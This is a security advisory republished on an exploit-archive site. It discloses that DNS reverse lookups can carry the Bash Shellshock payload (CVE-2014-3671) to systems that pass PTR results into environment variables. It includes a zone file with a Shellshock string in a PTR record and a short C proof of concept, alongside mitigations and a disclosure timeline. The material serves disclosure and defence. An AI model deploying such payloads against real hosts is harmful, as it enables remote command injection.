首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DNS Reverse Lookup Shellshock Exploit
来源:vfocus.net 作者:Dirk-Willem 发布时间:2014-10-15  
DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)
  
                       CVE-2014-3671
  
references:
     CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278 
     CVE-2014-7186 and, CVE-2014-7187
  
* Summary:
  
Above CVEs detail a number of flaws in bash prior related to the parsing 
of environment variables  (aka BashBug, Shellshock). Several networked
vectors for triggering this bug have been discovered; such as through
dhcp options and CGI environment variables in webservers [1].
  
This document is to advise you of an additional vector; through a 
reverse lookup in DNS; and where the results of this lookup are
passed, unsanitized, to an environment variable (e.g. as part of
a batch process). 
  
This vector is subtly different from a normal attack vector, as the
attacker can 'sit back' and let a (legitimate) user trigger the
issue; hence keeping the footprint for a IDS or WAAS to act on small.
  
* Resolvers/systems affected:
  
At this point of time the stock resolvers (in combination with the libc
library) of OSX 10.9 (all versions) and 10.10/R2 are the only known
standard installations that pass the bash exploit string back and
up to getnameinfo(). 
  
That means that UNpatched systems are vulnerable through this vector
PRIOR to the bash update documented in http://support.apple.com/kb/DL1769.
  
Most other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem 
unaffected in their stock install as libc/libresolver and DNS use 
different escaping mechanisms (octal v.s. decimal).
  
We're currently following investing a number of async DNS resolvers
that are commonly used in DB cache/speed optimising products and
application level/embedded firewall systems.
  
Versions affected: 
  
See above CVEs as your primary source.
  
* Resolution and Mitigation:
  
In addition to the mitigations listed in above CVEs - IDSes and similar 
systems may be configured to parse DNS traffic in order to spot the 
offending strings.
  
Also note that Apple DL1769 addresses the Bash issue; NOT the vector
through the resolver. 
  
* Reproducing the flaw:
  
A simple zone file; such as:
  
     $TTL 10;
     $ORIGIN in-addr.arpa.
     @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
                    666        ; serial
                    360 180 3600 1800 ; very short lifespan.
                    )
     IN          NS     127.0.0.1
     *           PTR      "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 
  
can be used to create an environment in which to test the issue with existing code
or with the following trivial example:
  
    #include <sys/socket.h>
    #include <netdb.h>
    #include <assert.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <netinet/in.h>
  
    int main(int argc, char ** argv) {
     struct in_addr addr;
     struct sockaddr_in sa;
     char host[1024];
  
     assert(argc==2);
     assert(inet_aton(argv[1],&addr) == 1);
  
     sa.sin_family = AF_INET;
     sa.sin_addr = addr;
  
     assert(0==getnameinfo((struct sockaddr *)&sa, sizeof sa,
          host, sizeof host, NULL, 0, NI_NAMEREQD));
  
     printf("Lookup result: %s\n\n", host);    
  
     assert(setenv("REMOTE_HOST",host,1) == 0);
     execl("/bin/bash",NULL);
    }
  
  
Credits and timeline
  
The flaw was found and reported by Stephane Chazelas (see CVE-2014-6271
for details).  Dirk-Willem van Gulik (dirkx(at)webweaving.org) found
the DNS reverse lookup vector.
  
09-04-2011     first reported.
2011, 2014     issue verified on various embedded/firewall/waas
               systems and reported to vendors. 
??-09-2014     Apple specific exploited seen.
11-10-2014     Apple confirms that with DL1769 in place that
               "The issue that remains, while it raises 
               interesting questions, is not a security 
               issue in and of itself."
  
* Common Vulnerability Scoring (Version 2) and vector:
  
See CVE-2014-6271.
  
1:https://github.com/mubix/shellshocker-pocs/blob/master/README.md)
1.10 / : 1726 $

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SEO Control Panel 3.6.0 - Auth
·Microsoft Bluetooth Personal A
·Android browser versions 4.4 c
·Drupal 7.X SQL Injection
·Wordpress InfusionSoft Upload
·SAP Netweaver Enqueue Server T
·Rejetto HttpFileServer Remote
·Drupal Core <= 7.32 - SQL Inje
·F5 iControl Remote Root Comman
·Drupal Core <= 7.32 - SQL Inje
·Linux Kernel 3.16.1 FUSE Privi
·Wordpress Theme Dazzling Shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved